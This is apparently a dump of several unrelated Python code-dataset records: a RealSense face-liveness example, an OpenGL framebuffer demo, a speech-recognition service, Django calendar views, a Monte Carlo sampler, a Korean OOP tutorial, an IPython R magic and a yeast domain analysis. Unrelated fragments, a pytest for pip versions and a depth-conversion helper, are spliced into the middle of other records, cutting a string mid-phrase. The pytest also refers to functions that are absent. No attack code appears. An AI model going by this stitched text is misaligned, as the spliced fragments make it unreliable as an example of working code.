hardware specific units\n\t# we have to manually convert it to milimeters for depth estimator to work properly\n\tdepthSensor = device.first_depth_sensor()\n\tdepthScale = depthSensor.get_depth_scale() * 1000\n\tprint(\"Depth scale is {}\".format(depthScale))\n\n\t#For warper to work properly, we need to align both stream viewports.\n\talign_to = rs.stream.color\n\tdepthToColorAlignment = rs.align(align_to)\n\n\t#create window\n\tcv2.namedWindow('Realsense depth example', cv2.WINDOW_AUTOSIZE)\n\t\n\t# main processing loop\n\ttry:\n\t\twhile True:\n\t\t\t# Get frameset of color and depth\n\t\t\tframes = pipe.wait_for_frames()\n\t\n\t\t\t# Align the depth frame to color 
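# The three test_pythonXYZ_pip_package_is_installed functions above differ
# only in the pip path and the expected versions; a single parametrised test
# could replace them (a sketch reusing this module's host fixture and assert
# helper):
import pytest

PIP_EXPECTATIONS = (
    ('2.6.9', {'pip': '9.0.3', 'pyOpenSSL': '17.5.0'}),
    ('2.7.15', {'pip': '10.0.1'}),
    ('3.6.6', {'pip': '10.0.1'}),
)

@pytest.mark.parametrize('version,expected', PIP_EXPECTATIONS)
def test_pinned_pip_packages(host, version, expected):
    pip_path = '/opt/pyenv/versions/{}/bin/pip'.format(version)
    packages = host.pip_package.get_packages(pip_path=pip_path)
    for name, ver in expected.items():
        assert_pip_package_version_is_installed(packages, name, ver)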
frame\n\t\t\talignedFrames = depthToColorAlignment.process(frames)\n\t\n\t\t\t# Get aligned frames\n\t\t\tdepthFrame = alignedFrames.get_depth_frame()\n\t\t\trgbFrame = alignedFrames.get_color_frame()\n\n\t\t\t# Validate that both frames are valid\n\t\t\tif not depthFrame or not rgbFrame:\n\t\t\t\tcontinue\n\t\t\n\t\t\t#convert depth map to milimeters\n\t\t\tdepthFrame = np.asanyarray(depthFrame.get_data())\n\t\t\tdepthFrame = (depthFrame * depthScale).astype(np.int16)\n\t\t\t\n\t\t\trgbFrame = np.asanyarray(rgbFrame.get_data())\n\t\t\t\n\t\t\t#convert incoming frames to SDK images\n\t\t\tdepthImage = fe.Image()\n\t\t\tdepthImage.setData(depthFrame, fe.FormatType.R16)\n\n\t\t\trgbImage = fe.Image()\n\t\t\trgbImage.setData(rgbFrame, fe.FormatType.R8G8B8)\n\n\t\t\t#perform detection\n\t\t\terr, face = detector.detectOne(rgbImage, rgbImage.getRect(), fe.DetectionType(fe.dt5Landmarks))\n\n\t\t\t#prepare cv image for visualisation\n\t\t\tcvRGBImage = cv2.cvtColor(rgbFrame, cv2.COLOR_BGR2RGB)\n\n\t\t\tif(err.isError):\n\t\t\t\tprint(\"Failed to detect!\")\n\t\t\telse:\n\t\t\t\tif(face.isValid() and face.landmarks5_opt.isValid()):\t\n\t\t\t\t\t#warp depth image\n\t\t\t\t\ttransformation = warper.createTransformation(face.detection, face.landmarks5_opt.value())\n\t\t\t\t\twarpResult, warpImage = warper.warp(depthImage, transformation)\n\t\t\t\t\tif warpResult.isError:\n\t\t\t\t\t\tprint(\"Failed to warp image!\")\n\t\t\t\t\t\n\t\t\t\t\t#perform depth liveness estimation\n\t\t\t\t\terror, output = estimator.estimate(warpImage)\n\t\t\t\t\tif(error.isOk):\n\t\t\t\t\t\tcolor = (0, 255, 0) if output.isReal else (0, 0, 255)\n\t\t\t\t\t\tbox = face.detection.rect\n\t\t\t\t\t\t#draw bbox\n\t\t\t\t\t\tcv2.rectangle(cvRGBImage,\n\t\t\t\t\t\t\t(int(box.x), int(box.y)),\n\t\t\t\t\t\t\t(int(box.x + box.width), int(box.y + box.height)),\n\t\t\t\t\t\t\tcolor, 2)\n\t\t\t\t\t\tprint(output)\n\n\t\t\tcv2.imshow('Realsense depth example', cvRGBImage)\n\t\t\tkey = cv2.waitKey(1)\n\t\t\t# Press esc or 'q' to close the image window\n\t\t\tif key & 0xFF == ord('q') or key == 27:\n\t\t\t\tcv2.destroyAllWindows()\n\t\t\t\tbreak\n\tfinally:\n\t\tpipe.stop()","sub_path":"examples/example_depth.py","file_name":"example_depth.py","file_ext":"py","file_size_in_byte":3897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"72320660","text":"\"\"\"\ndemo shows how to handle simple framebuffers.\n\nresults:\n- keeping viewport size constant within framebuffer\n is important to fit texture sizes. 
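# example_depth.py above converts raw realsense depth units to millimetres
# with (frame * depth_scale).astype(np.int16); anything past ~32.7 m would
# wrap around in int16. A variant that clips instead (a sketch; the frame is
# assumed to already be a uint16 array as in the demo):
import numpy as np

def depth_to_mm(raw_depth, depth_scale_mm):
    """raw_depth: uint16 device units; depth_scale_mm: device-unit -> mm factor."""
    mm = raw_depth.astype(np.float32) * depth_scale_mm
    return np.clip(mm, 0, np.iinfo(np.int16).max).astype(np.int16)

assert depth_to_mm(np.array([0, 40000], np.uint16), 1.0)[1] == 32767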
\n\n@author Nicolas 'keksnicoh' Heimann \n\"\"\"\nfrom gllib.glfw import * \nfrom OpenGL.GL import * \nimport numpy \nfrom time import time\nif not glfwInit(): \n raise RuntimeError('glfw.Init() error')\n\nglfwWindowHint(GLFW_CONTEXT_VERSION_MAJOR, 4);\nglfwWindowHint(GLFW_CONTEXT_VERSION_MINOR, 1);\nglfwWindowHint(GLFW_OPENGL_FORWARD_COMPAT, GL_TRUE);\nglfwWindowHint(GLFW_OPENGL_PROFILE, GLFW_OPENGL_CORE_PROFILE);\n\nwindow1 = glfwCreateWindow(400, 400)\nif not window1: raise RuntimeError('glfw.CreateWindow() error')\n\nvertex_position = numpy.array([\n 0.8, 0.8, 0.8, -0.8, -0.8, -0.8, -0.8, 0.8, 0.8, 0.8\n], dtype=numpy.float32)\nscreen_position = numpy.array([\n -0.95, 0.95, \n -0.95, -0.95, \n 0.95, -0.95, \n 0.95, -0.95, \n 0.95, 0.95,\n -0.95, 0.95, \n], dtype=numpy.float32)\n\ntex_position = numpy.array([\n 0, 1,\n 0, 0,\n 1, 0,\n 1, 0,\n 1, 1,\n 0, 1\n], dtype=numpy.float32)\nVERT_SHADER_ID = \"#version 410\\nin vec2 vertex_position; void main() { gl_Position = vec4(vertex_position, 0, 1); }\"\nFRAG_SHADER_ID = \"#version 410\\nout vec4 output_color; void main() { output_color = vec4(1,0,0,1); }\"\n\nVERT_SHADER_FRAME = \"\"\"\n#version 410\nin vec2 vertex_position;\nin vec2 tex_coords;\nout vec2 frag_tex_coord;\nvoid main() {\n frag_tex_coord = tex_coords;\n gl_Position = vec4(vertex_position, 0, 1); \n}\n\"\"\"\nFRAG_SHADER_FRAME = \"\"\"\n#version 410\nuniform sampler2D tex[1];\nin vec2 frag_tex_coord;\nout vec4 output_color;\nuniform float time;\nvec2 transformed;\nvoid main() {\n output_color = vec4(0.1,1,0,1);\n transformed = vec2(\n exp(-5*sin(time)*(pow(frag_tex_coord[0]-0.5,2)+pow(frag_tex_coord[1]-0.5,2)))*frag_tex_coord[0],\n exp(-5*sin(time)*(pow(frag_tex_coord[0]-0.5,2)+pow(frag_tex_coord[1]-0.5,2)))*frag_tex_coord[1]\n );\n output_color = texture(tex[0], transformed);\n output_color = mix(output_color, vec4(0, transformed ,1), 0.2);\n}\n\"\"\"\n\nglfwMakeContextCurrent(window1)\nprogram1 = glCreateProgram()\nvertex_shader1 = glCreateShader(GL_VERTEX_SHADER)\nglShaderSource(vertex_shader1, VERT_SHADER_ID)\nglCompileShader(vertex_shader1)\nglAttachShader(program1, vertex_shader1)\nfragment_shader1 = glCreateShader(GL_FRAGMENT_SHADER)\nglShaderSource(fragment_shader1, FRAG_SHADER_ID)\nglCompileShader(fragment_shader1)\nglAttachShader(program1, fragment_shader1)\nglLinkProgram(program1)\n\nprogram_frame = glCreateProgram()\nvertex_shader_frame = glCreateShader(GL_VERTEX_SHADER)\nglShaderSource(vertex_shader_frame, VERT_SHADER_FRAME)\nglCompileShader(vertex_shader_frame)\nglAttachShader(program_frame, vertex_shader_frame)\nfrag_shader_frame = glCreateShader(GL_FRAGMENT_SHADER)\nglShaderSource(frag_shader_frame, FRAG_SHADER_FRAME)\nglCompileShader(frag_shader_frame)\nglAttachShader(program_frame, frag_shader_frame)\nglLinkProgram(program_frame)\n\nglfwMakeContextCurrent(window1)\nvert_attr1 = glGetAttribLocation(program1, 'vertex_position')\nvert_attr2 = glGetAttribLocation(program_frame, 'vertex_position')\ntex_coords = glGetAttribLocation(program_frame, 'tex_coords')\n\n# rectangle init\nglfwMakeContextCurrent(window1)\nvao1 = glGenVertexArrays(1)\nvbo1 = glGenBuffers(1)\n\nglBindBuffer(GL_ARRAY_BUFFER, vbo1)\nglBufferData(GL_ARRAY_BUFFER, ArrayDatatype.arrayByteCount(vertex_position), vertex_position, GL_STATIC_DRAW)\nglBindBuffer(GL_ARRAY_BUFFER, 0)\nglBindVertexArray(vao1)\nglBindBuffer(GL_ARRAY_BUFFER, vbo1)\nglVertexAttribPointer(vert_attr1, 2, GL_FLOAT, GL_FALSE, 0, None)\nglEnableVertexAttribArray(0)\nglBindBuffer(GL_ARRAY_BUFFER, 0)\nglBindVertexArray(0)\n\n# 
framebuffer screen init\nvao_frame = glGenVertexArrays(1)\nvbo_frame = glGenBuffers(2)\nglBindVertexArray(vao_frame)\nglBindBuffer(GL_ARRAY_BUFFER, vbo_frame[0])\nglBufferData(GL_ARRAY_BUFFER, ArrayDatatype.arrayByteCount(screen_position), screen_position, GL_STATIC_DRAW)\nglVertexAttribPointer(vert_attr2, 2, GL_FLOAT, GL_FALSE, 0, None)\nglEnableVertexAttribArray(0)\nglBindBuffer(GL_ARRAY_BUFFER, 0)\n\nglBindBuffer(GL_ARRAY_BUFFER, vbo_frame[1])\nglBufferData(GL_ARRAY_BUFFER, ArrayDatatype.arrayByteCount(tex_position), tex_position, GL_STATIC_DRAW)\nglVertexAttribPointer(tex_coords, 2, GL_FLOAT, GL_FALSE, 0, None)\nglEnableVertexAttribArray(1)\nglBindBuffer(GL_ARRAY_BUFFER, 0)\nglBindVertexArray(0)\n\n# framebuffer init\nrgb_tex_id = glGenTextures(1)\nglBindTexture(GL_TEXTURE_2D, rgb_tex_id);\nglTexImage2D(GL_TEXTURE_2D, 0, GL_RGBA, 800, 800, 0, GL_RGBA, GL_UNSIGNED_BYTE, None);\nglTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_MAG_FILTER, GL_LINEAR)\nglTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER, GL_LINEAR)\nglBindTexture(GL_TEXTURE_2D, 0);\n\nframebuffer_id = glGenFramebuffers(1);\nglBindFramebuffer(GL_DRAW_FRAMEBUFFER, framebuffer_id)\nglDrawBuffer(GL_COLOR_ATTACHMENT0)\nglFramebufferTexture(GL_FRAMEBUFFER, GL_COLOR_ATTACHMENT0, rgb_tex_id, 0);\nrid = glGenRenderbuffers(1)\n\nstart_time = time()\ngl_time = glGetUniformLocation(program_frame, 'time')\n\nwhile not glfwWindowShouldClose(window1):\n timer = time() - start_time\n glfwPollEvents()\n\n # note:\n #\n # viewport changes after glfwPollEvents.\n # to restore viewport after framebuffer, persist\n # current viewport\n old_viewport = glGetIntegerv(GL_VIEWPORT)\n\n glBindFramebuffer(GL_DRAW_FRAMEBUFFER, framebuffer_id)\n\n # note:\n #\n # set viewport size still 800x800 to fit \n # texture sizes\n glViewport(0, 0, 800, 800)\n\n glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)\n glUseProgram(program1)\n glBindVertexArray(vao1)\n glDrawArrays(GL_LINE_STRIP, 0, 5)\n glBindVertexArray(0)\n glUseProgram(0)\n glBindFramebuffer(GL_DRAW_FRAMEBUFFER, 0)\n\n # note:\n # restore old viewport (before framebuffer frame)\n glViewport(*old_viewport)\n glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)\n glActiveTexture(GL_TEXTURE0);\n glBindTexture (GL_TEXTURE_2D, rgb_tex_id)\n\n glUseProgram(program_frame)\n glUniform1f(gl_time, timer)\n glBindVertexArray(vao_frame)\n glDrawArrays(GL_TRIANGLES, 0, 6)\n glBindVertexArray(0)\n glUseProgram(0)\n glfwSwapBuffers(window1)\n\n","sub_path":"demos/framebuffer.py","file_name":"framebuffer.py","file_ext":"py","file_size_in_byte":6249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"116259471","text":"from inference_lib import load_model_and_generator, get_results\nimport json\nfrom model_item import ModelItem\nfrom punctuate.punctuate_text import Punctuation\nfrom inverse_text_normalization.run_predict import inverse_normalize_text\n\nclass ModelService:\n\n def __init__(self, model_config, decoder_type, cuda, half):\n self.model_items = {}\n self.cuda = cuda\n self.half = half\n for language_code, path in model_config.items():\n path_split = path.split(\"/\")\n base_path = \"/\".join(path_split[:-1])\n model_file_name = path_split[-1]\n model_item = ModelItem(base_path, model_file_name, language_code)\n\n model, generator = load_model_and_generator(model_item, self.cuda, decoder = decoder_type, half = self.half)\n\n if language_code == 'en-IN':\n model_item.set_punctuation_model(Punctuation('en'))\n elif language_code == 'hi':\n 
model_item.set_punctuation_model(Punctuation(language_code))\n\n model_item.set_model(model)\n model_item.set_generator(generator)\n self.model_items[language_code] = model_item\n\n def apply_punctuation_and_itn(self, result, model_item, enable_punctuation, enable_inverse_text_normalization):\n language_code = model_item.get_language_code()\n if enable_punctuation:\n punctuation_response = model_item.get_puncutation_model().punctuate_text([result])\n result = punctuation_response[0]\n \n if enable_inverse_text_normalization:\n language_code = 'en' if language_code == 'en-IN' else language_code\n itn_response = inverse_normalize_text([result],lang=language_code)\n result = itn_response[0]\n \n return result\n\n def get_inference(self, file_name, language_code, enable_punctuation = False, enable_inverse_text_normalization = False):\n model_item = self.model_items[language_code]\n\n result = get_results(\n wav_path = file_name,\n dict_path = model_item.get_dict_file_path(),\n generator = model_item.get_generator(),\n use_cuda = self.cuda,\n model = model_item.get_model(),\n half = self.half\n )\n\n result = self.apply_punctuation_and_itn(result, model_item, enable_punctuation, enable_inverse_text_normalization)\n\n \n return result\n \n \n\nif __name__ == \"__main__\":\n from inference_lib import Wav2VecCtc\n with open('model_config.json','r') as f:\n model_config = json.load(f)\n model_service = ModelService(model_config, 'kenlm', True, True)\n result = model_service.get_inference(\"/home/nireshkumarr/inference-wrapper/files/indian_english/741_3365file-ideleoSHW2Gd0.wav\", 'en-IN')\n print(result)","sub_path":"model_service.py","file_name":"model_service.py","file_ext":"py","file_size_in_byte":2816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"290991143","text":"from datetime import datetime, timedelta, date\nfrom django.shortcuts import render, get_object_or_404\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.views import generic\nfrom django.urls import reverse\nfrom django.utils.safestring import mark_safe\nimport calendar\nfrom django.apps import apps\nfrom datetime import datetime, date, timedelta\n\nfrom .models import *\nfrom .utils import *\nfrom .forms import *\n\n\nclass PlanNettoyageView(generic.ListView):\n model = PlanNettoyage\n template_name = 'plan_nettoyage/calendrier_plan_nettoyage.html'\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n d = get_date(self.request.GET.get('month', None))\n cal = Calendar(d.year, d.month)\n html_cal = cal.formatmonth(withyear=True)\n context['calendar'] = mark_safe(html_cal)\n context['prev_month'] = prev_month(d)\n context['next_month'] = next_month(d)\n return context\n\ndef get_date(req_month):\n if req_month:\n year, month = (int(x) for x in req_month.split('-'))\n return date(year, month, day=1)\n return datetime.today()\n\ndef prev_month(d):\n first = d.replace(day=1)\n prev_month = first - timedelta(days=1)\n month = 'month=' + str(prev_month.year) + '-' + str(prev_month.month)\n return month\n\ndef next_month(d):\n days_in_month = calendar.monthrange(d.year, d.month)[1]\n last = d.replace(day=days_in_month)\n next_month = last + timedelta(days=1)\n month = 'month=' + str(next_month.year) + '-' + str(next_month.month)\n return month\n\ndef event(request, event_id=None):\n instance = PlanNettoyage()\n if event_id:\n instance = get_object_or_404(PlanNettoyage, pk=event_id)\n else:\n instance = PlanNettoyage()\n\n 
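# ModelService above maps 'en-IN' to 'en' in two separate places (punctuation
# model selection and ITN); centralising the mapping keeps the two from
# drifting apart (a sketch -- 'en-IN' is the only such code in the record):
BASE_LANGUAGE = {'en-IN': 'en'}

def normalize_language_code(code):
    """Collapse region-specific codes to the base code the NLP models expect."""
    return BASE_LANGUAGE.get(code, code)

assert normalize_language_code('en-IN') == 'en'
assert normalize_language_code('hi') == 'hi'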
form = PlanNettoyageForm(request.POST or None, instance=instance)\n\n    if request.POST and form.is_valid():\n\n        title = form.cleaned_data['title']\n        start_time = form.cleaned_data['start_time']\n        end_time = form.cleaned_data['end_time']\n        first_name_collaborateur = form.cleaned_data['first_name_collaborateur']\n        last_name_collaborateur = form.cleaned_data['last_name_collaborateur']\n        piece = form.cleaned_data['piece']\n        description = form.cleaned_data['description']\n\n        # Get the collaborator id and the next free plan id\n        plan_nettoyage = PlanNettoyage.objects.filter(user_username=request.user.get_username())\n        id_collaborateur = apps.get_model('collaborateurs', 'Collaborateur').objects.filter(\n            user_username=request.user.get_username(),\n            first_name=first_name_collaborateur,\n            last_name=last_name_collaborateur,\n        )[0].id_collaborateur\n        try:\n            # built-in int()/max() instead of np.int()/np.max(): numpy is never imported in this module\n            id_plan_nettoyage = int(max([y.id_plan_nettoyage for y in plan_nettoyage]) + 1)\n        except Exception:\n            id_plan_nettoyage = 1\n\n        asset, created = PlanNettoyage.objects.get_or_create(\n            date=datetime.today(),\n            title=title,\n            id_plan_nettoyage=id_plan_nettoyage,\n            id_collaborateur=id_collaborateur,\n            start_time=start_time,\n            end_time=end_time,\n            first_name_collaborateur=first_name_collaborateur,\n            last_name_collaborateur=last_name_collaborateur,\n            piece=piece,\n            description=description,\n            user_username=request.user.get_username())\n\n        return HttpResponseRedirect(reverse('calendrier_plan_nettoyage'))\n    return render(request, 'plan_nettoyage/events.html', {'form': form})\n","sub_path":"apps/plan_nettoyage/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"571897465","text":"import random\nimport math\nimport pylab\nimport numpy as np\n\nd = 20\nx = [0.0]*d\ndelta = 0.1\nn_trials = 10000000\nold_radius_square = 0.0\nhisto_data = []\n\nfor i in range(n_trials):\n    k = random.randint(0, d - 1)\n    x_old_k = x[k]\n    x_new_k = x_old_k + random.uniform(-delta, delta)\n    new_radius_square = old_radius_square + x_new_k ** 2 - x_old_k ** 2\n    if new_radius_square < 1.0:\n        old_radius_square = new_radius_square\n        histo_data.append(math.sqrt(new_radius_square))\n        x[k] = x_new_k\n\npylab.hist(histo_data, bins=200, density=True, label='#r = sqrt(x[0]**2 + x[1]**2 + ... + x[d-1]**2)')\npylab.xlabel('r')\npylab.ylabel('distribution')\ny = lambda x: d*(x**(d-1))\nxp = np.linspace(0,1,1000)\npylab.plot(xp,list(map(y,xp)),label=f\"P(r) = {d}*(x**{d-1})\")\npylab.grid()\npylab.legend(loc='upper left')\npylab.savefig(f'd{d}_r_hist.png')\npylab.show()","sub_path":"B1C.py","file_name":"B1C.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"57881864","text":"# Object-oriented programming (OOP) -> code reuse, avoiding duplication, etc.\n# A closer look at classes\n# Class variables vs. instance variables\n\n# Conventional (non-OOP) coding\n\n# Student 1\nstudent_name_1 = 'Kim'\nstudent_number_1 = 1\nstudent_grade_1 = 1\nstudent_detail_1 = [\n    {'gender' : 'Male'},\n    {'score1' : 95},\n    {'score2' : 88}\n]\n\n# Student 2\nstudent_name_2 = 'Lee'\nstudent_number_2 = 2\nstudent_grade_2 = 2\nstudent_detail_2 = [\n    {'gender' : 'Male'},\n    {'score1' : 77},\n    {'score2' : 92}\n]\n\n# Student 3\nstudent_name_3 = 'Park'\nstudent_number_3 = 3\nstudent_grade_3 = 4\nstudent_detail_3 = [\n    {'gender' : 'Female'},\n    {'score1' : 99},\n    {'score2' : 100}\n]\n\n# List-based structure\nstudent_names_list = ['Kim', 'Lee', 'Park']\nstudent_numbers_list = [1, 2, 3]\nstudent_grades_list = [1, 2, 4]\nstudent_details_list = [\n    {'gender': 'Male', 'score1': 95, 'score2': 88},\n    {'gender': 'Male', 'score1': 77, 'score2': 92},\n    {'gender': 'Female', 'score1': 99, 'score2': 100},\n]\n\n# Deleting a student\ndel student_names_list[1]\ndel student_numbers_list[1]\ndel student_grades_list[1]\ndel student_details_list[1]\n\nprint(student_names_list)\nprint(student_numbers_list)\nprint(student_grades_list)\nprint(student_details_list)\n\n# Dictionary-based structure\nstudents_dicts = [\n    {'student_name': 'Kim', 'student_number':1, 'student_grade':1, 'student_detail': {'score1': 95, 'score2': 99}},\n    {'student_name': 'Lee', 'student_number':2, 'student_grade':2, 'student_detail': {'score1': 77, 'score2': 80}},\n    {'student_name': 'Park', 'student_number': 3, 'student_grade': 3,\n     'student_detail': {'score1': 80, 'score2': 100}}\n]\n\ndel students_dicts[1]\nprint(students_dicts)\n\n\n# Class-based structure\n# Designing the structure first increases reusability, minimizes code repetition, and lets us use methods\nclass Student:\n    def __init__(self, name, number, grade, details):\n        self._name = name\n        self._number = number\n        self._grade = grade\n        self._details = details\n\n    def __str__(self):\n        return 'str : {} - {}'.format(self._name, self._number)\n\n    def __repr__(self):\n        return 'repr : {} - {}'.format(self._name, self._number)\n\nstudent1 = Student('Kim', 1, 1, {'gender': 'Male', 'score1': 95, 'score': 100})\nstudent2 = Student('Lee', 2, 2, {'gender': 'Male', 'score1': 80, 'score': 80})\nstudent3 = Student('Park', 3, 3, {'gender': 'Female', 'score1': 50, 'score': 60})\n\nprint(student1.__dict__)\nprint(student2.__dict__)\nprint(student3.__dict__)\n\n# Declaring a list of instances\nstudents_list = []\nstudents_list.append(student1)\nstudents_list.append(student2)\nstudents_list.append(student3)\n\nprint(students_list)\n\nfor x in students_list:\n    print(repr(x))\n    print(x) # __str__ 메소드 호출. 
없으면 __repr__ 호출\n\n\n\n\n\n\n\n\n\n","sub_path":"algorithm/python_advanced/1.class-advanced-1.py","file_name":"1.class-advanced-1.py","file_ext":"py","file_size_in_byte":2738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"496906201","text":"import rpy2.rinterface as ri\nimport numpy as np\nimport rpy2.robjects as ro\nimport sys\nimport tempfile\nfrom glob import glob\nfrom shutil import rmtree\nfrom getopt import getopt\n\n# for publishing the information to the frontends\n\nfrom IPython.core.displaypub import publish_display_data\n\n# enable conversion of numpy arrays into R objects (following to rpy2 documentation)\nfrom rpy2.robjects.numpy2ri import numpy2ri\nro.conversion.py2ri = numpy2ri\n\nclass Rmagic(object):\n\n def __init__(self, shell=None):\n self.r = ro.R()\n self.output = []\n self.eval = ri.baseenv['eval']\n self.shell = shell\n\n def write_console(self, output):\n self.output.append(output)\n\n def flush(self):\n value = ''.join(self.output)\n self.output = []\n return value\n\n def cell_magic(self, args, text):\n # need to get the ipython instance for assigning\n\n opts, args = getopt(args.strip().split(' '), None, ['inputs=',\n 'outputs=',\n # these are options for png\n 'width=',\n 'height=',\n 'units=',\n 'pointsize=',\n 'bg='])\n\n opts = dict(opts)\n outputs = []\n for option, value in opts.items():\n if option == '--inputs':\n # need to have access the shell to assign these\n # python variables to variables in R\n opts.pop('--inputs')\n # with self.shell, we will assign the values to variables in the shell \n # for now, this is a hack, with self.shell a dictionary\n for input in value.split(','):\n self.r.assign(input, self.shell[input])\n if option == '--outputs':\n outputs = value.split(',')\n opts.pop('--outputs')\n \n png_args = ','.join(['%s=%s' % (o[2:],v) for o, v in opts.items()])\n\n # execute the R code in a temporary directory \n\n tmpd = tempfile.mkdtemp()\n self.r('png(\"%s/Rplots%%03d.png\",%s)' % (tmpd, png_args))\n self.eval(ri.parse(text))\n self.r('dev.off()')\n\n # read out all the saved .png files\n\n images = [file(imgfile).read() for imgfile in glob(\"%s/Rplots*png\" % tmpd)]\n \n # now publish the images\n # mimicking IPython/zmq/pylab/backend_inline.py\n fmt = 'png'\n mimetypes = { 'png' : 'image/png', 'svg' : 'image/svg+xml' }\n mime = mimetypes[fmt]\n\n # publish the printed R objects, if any\n publish_display_data('Rmagic.cell_magic', {'text/plain':self.flush()})\n\n # flush text streams before sending figures, helps a little with output \n for image in images:\n # synchronization in the console (though it's a bandaid, not a real sln) \n sys.stdout.flush(); sys.stderr.flush()\n publish_display_data(\n 'Rmagic.cell_magic',\n {mime : image}\n )\n value = {}\n\n # try to turn every output into a numpy array\n # this means that outputs are assumed to be castable\n # as numpy arrays\n\n for output in outputs:\n # with self.shell, we will assign the values to variables in the shell \n self.shell[output] = np.asarray(self.r(output))\n\n # kill the temporary directory\n rmtree(tmpd)\n\n\n\n\n\nrmagic = Rmagic()\nri.set_writeconsole(rmagic.write_console)\n\nif __name__ == '__main__':\n\n snippet = '''\n a=lm(Y~X)\n print(summary(a))\n plot(X, Y, pch=23, bg='orange', cex=2)\n plot(Y, X)\n print(summary(X))\n r = resid(a)\n '''\n\n opts = '--bg=\"gray\" --width=700 --inputs=X,Y --outputs=r'\n\n # for now, this is a placeholder that will eventually be\n # a full ipython shell\n #\n # it is only 
used to retrieve the value of the variables to \n    # be assigned as inputs into R\n    rmagic.shell = {'X': np.random.standard_normal(40),\n                    'Y': np.random.standard_normal(40)}\n\n    result = rmagic.cell_magic(opts, snippet)\n","sub_path":"Rmagic.py","file_name":"Rmagic.py","file_ext":"py","file_size_in_byte":4452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"523701637","text":"import importlib\nimport inspect\nimport json\nimport os\nimport platform\nfrom functools import partial\n\nimport sys\n\nHTTP_METHODS = ['GET', 'POST', 'PUT', 'DELETE', 'PATCH', 'OPTIONS']\n\n\ndef jsonify(result, pretty=False, indent=None, separators=None):\n    if pretty:\n        indent = indent or 4\n        separators = separators or (\",\", \": \")\n    else:\n        separators = separators or (\",\", \":\")\n\n    return json.dumps(result, indent=indent, separators=separators)\n\n\ndef import_attr(module, attr: str, cwd='.'):\n    if type(attr) is not str:\n        raise AttributeError(f\"{attr} is not a string.\")\n    if cwd not in sys.path:\n        sys.path.insert(0, cwd)\n    app_module = importlib.import_module(module)\n    if \"PYTEST_CURRENT_TEST\" in os.environ:\n        # needed as the Chalice local server changes the class\n        app_module = importlib.reload(app_module)\n    return getattr(app_module, attr)\n\n\ndef class_auth_methods(obj):\n    \"\"\"Returns the auth method from the class if exists.\"\"\"\n    methods = inspect.getmembers(obj.__class__, lambda x: inspect.isfunction(x))\n\n    for name, func in methods:\n        if name == 'auth':\n            function_is_static = isinstance(inspect.getattr_static(obj.__class__, func.__name__), staticmethod)\n            if function_is_static:\n                return func\n            return partial(func, obj)\n    return None\n\n\ndef class_cws_methods(obj):\n    \"\"\"Returns the list of methods from the class.\"\"\"\n    methods = inspect.getmembers(obj.__class__, lambda x: inspect.isfunction(x))\n\n    return [fun for _, fun in methods if hasattr(fun, '__CWS_METHOD')]\n\n\ndef class_attribute(obj, name: str = None, defaut=None):\n    \"\"\"Returns the list of attributes from the class or the attribute if name parameter is defined\n    or default value if not found.\"\"\"\n    attributes = inspect.getmembers(obj.__class__, lambda x: not inspect.isroutine(x))\n\n    if not name:\n        return attributes\n\n    filtered = [a[1] for a in attributes if a[0] == name]\n    return filtered[0] if filtered else defaut\n\n\ndef path_join(*args):\n    \"\"\" Joins given arguments into an entry route.\n    Trailing but not leading slashes are stripped for each argument.\n    \"\"\"\n\n    reduced = [x.lstrip('/').rstrip('/') for x in args if x]\n    return '/'.join([x for x in reduced if x])\n\n\ndef make_absolute(route):\n    return '/' + path_join(route)\n\n\ndef trim_underscores(name):\n    while name.startswith('_'):\n        name = name[1:]\n    while name.endswith('_'):\n        name = name[:-1]\n    return name\n\n\ndef as_list(var):\n    if var is None:\n        return []\n    if type(var) is list:\n        return var\n    return [var]\n\n\ndef get_system_info():\n    python_info = f\"python {sys.version_info[0]}.{sys.version_info[1]}.{sys.version_info[2]}\"\n    platform_system = platform.system().lower()\n    platform_release = platform.release()\n    platform_info = f\"{platform_system} {platform_release}\"\n    return f\"{python_info}, {platform_info}\"\n","sub_path":"coworks/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"184517834","text":"\n# coding: utf-8\n\n# In[5]:\n\n\nimport numpy as np\nimport pandas as pd\nimport pybedtools\nimport re\nfrom scipy import stats\n\n\n# In[6]:\n\n\n# Loading the DOMAIN dataset into a dataframe\ndomains = pd.read_csv('domains.csv', names=['seq id', 'alignment start', 'alignment end', 'envelope start',\n                                            'envelope end', 'hmm acc', 'hmm name', 'type', 'hmm start', 'hmm end',\n                                            'hmm length', 'bit score', 'E-value', 'clan'])\n\n# Loading table with SEQ ID and corresponding GENE NAMES (ORDERED LOCUS)\ndomain_loci = pd.read_csv('uniprot-filtered-proteome_UP000002311+AND+organism__Saccharomyces+cerevisi--.tab', sep='\\t')\n# Merging the domain dataset with domain_loci to add gene locus names onto the domain dataset; dropping uninformative columns\ndomains = pd.merge(domains, domain_loci, left_on='seq id', right_on='Entry').drop(['Entry', 'type', 'clan', 'envelope start', 'envelope end',\n                                                                                  'hmm start', 'hmm end', 'hmm length', 'bit score', 'E-value'], axis=1)\nnew_cols = domains.columns.values\nnew_cols[5] = 'Gene locus'\ndomains.columns = new_cols\ndomains.head()\n\n\n# In[7]:\n\n\n# Loading the ANNOTATED GENOME dataset as a dataframe\nannotations = pybedtools.BedTool('saccharomyces_cerevisiae.bed').to_dataframe()\nannotations = annotations.drop(['score', 'thickStart', 'thickEnd', 